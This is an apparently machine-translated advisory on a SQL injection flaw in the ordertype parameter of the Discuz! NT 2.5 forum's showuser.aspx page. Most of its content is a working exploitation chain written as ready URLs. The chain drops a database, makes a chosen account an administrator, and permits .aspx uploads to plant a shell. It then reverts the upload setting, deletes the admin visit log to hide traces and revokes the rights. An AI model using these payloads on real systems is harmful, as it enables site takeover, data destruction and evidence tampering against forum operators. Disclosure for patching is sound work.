Using discuz! NT 2.5 or just upgraded to discuz! NT 2.5 Forum version of users need to pay attention to the content of this article, timely to the official website to find solutions.
Vulnerability Description: discuz! NT 2.5 is a powerful community software based on ASP.net platform of Kangsheng (Beijing) Technology Co., Ltd. Based on the advanced. Net Framework, the default support SQL Server database, extensible support access, MySQL and other databases, support IIS5, IIS6, IIS7, safe and efficient, stable and easy to use, give full play to the asp.net characteristics, Support free choice to switch skin and support data conversion in a variety of other forums.
discuz! NT 2.5 strengthens the forum function, enhances the speed and the stability, the load ability also has the remarkable improvement, on this foundation also will provide the powerful function package including the commodity transaction, the space, the photo album and so on, for the user free choice installs, manifests the formidable expansion extensibility. Whether from the function, performance, or from the support of the environment, are currently the most sophisticated and mature asp.net community software. However, the Isto member found a security vulnerability in which a successful exploit could be used to directly modify the administrator's password into the background to gain administrator privileges to control the entire site.
Vulnerability Manufacturer: http://www.comsenz.com
Vulnerability Resolution: in discuz! NT 2.5 (Pre-20080826 Update) version of the Showuser.aspx page because of the OrderType variable is not handled well! Causes SQL injection, malicious attacks users do not even register accounts, as long as the carefully constructed ordertype can exploit this vulnerability.
Vulnerability test:
Http://www.*.com/bbs/showuser.aspx?ordertype=desc;drop Database kj;–
Http://www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_users set adminid= ' 1′,groupid= ' 1′where username= ' Webtets '; –//update to Admin
Http://www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_attachtypes set extension= ' aspx ' where extension= ' jpg ' ; –//update to ASPX can be uploaded
After getting the shell ...
Http://www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_attachtypes set extension= ' jpg ' where extension= ' aspx ' ; –//update back to JPG
Http://www.*.com/bbs/showuser.aspx?ordertype=desc;delete from Dnt_adminvisitlog where username= ' webtets '; –//Delete log
Http://www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_users Set adminid= ", groupid=" where username= ' webtets ' ; –//Cancel Admin